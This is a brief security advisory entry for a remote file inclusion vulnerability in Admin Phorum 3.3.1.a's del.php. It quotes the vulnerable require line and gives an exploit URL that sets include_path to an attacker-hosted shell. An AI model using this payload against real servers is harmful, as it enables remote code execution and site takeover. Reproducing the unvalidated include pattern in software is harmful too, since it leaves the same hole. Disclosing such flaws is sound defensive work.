Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability

2007-02-28T00:00:00
ID SECURITYVULNS:DOC:16217
Type securityvulns
Reporter Securityvulns
Modified 2007-02-28T00:00:00

Description

######################################################################### # # # Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability # # # # Author: Gold_M <Hacker_ [at] w.Cn> [Mahmood_ali] # # # # Homepage: Www.Tryag.Cc # # # #########################################################################

######################################################################### # Download S : http://www.phpforums.net/admin331.zip # # Other Info : http://www.phpforums.net/index.php?dir=dld # # # # v.Code : Line 3 # # # # require "$include_path/delete_message.php"; # # # # Exploit: # # http://[VicTim]/[PaTh]/actions/del.php?include_path=[SHELL-TRYAG] # # # #########################################################################